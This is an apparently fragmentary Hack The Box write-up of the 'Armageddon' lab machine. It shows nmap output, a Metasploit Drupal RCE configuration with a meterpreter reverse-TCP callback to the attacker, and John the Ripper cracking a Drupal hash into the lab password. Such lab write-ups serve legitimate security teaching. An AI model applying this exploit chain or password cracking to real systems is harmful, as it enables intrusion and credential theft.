Armageddon was a easy linux machine by bertolis on HTB. Initial foothold was finding a drupal instance. and enumerating this more we find the version which has a unauthenticated RCE using which we get a shell. Privilege Escalation was exploiting sudo snap with gtfobins to get root.
# Nmap 7.91 scan initiated Sun Mar 28 08:57:58 2021 as: nmap -sC -sV -oN nmap/armageddon 10.10.10.233 Nmap scan report for 10.10.10.233 Host is up (0.082s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA) | 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA) |_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 |_http-title: Welcome to Armageddon | Armageddon
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Mar 28 08:58:11 2021 -- 1 IP address (1 host up) scanned in 13.19 seconds
Let start with port 80
Seeing a create user I tried to create a user
but we get an error as
In robots.txt I saw there is an entry for CHANGELOG.txt
Name Current Setting Required Description ---- --------------- -------- ----------- DUMP_OUTPUT false no Dump payload command output PHP_FUNC passthru yes PHP function to execute Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.233 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path to Drupal install VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST tun0 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
$john -w=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (Drupal7, $S$ [SHA512 128/128 SSE2 2x]) Cost 1 (iteration count) is 32768 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status booboo (?) 1g 0:00:00:01 DONE (2021-03-28 10:50) 0.6711g/s 155.7p/s 155.7c/s 155.7C/s tiffany..harley Use the "--show" option to display all of the cracked passwords reliably Session completed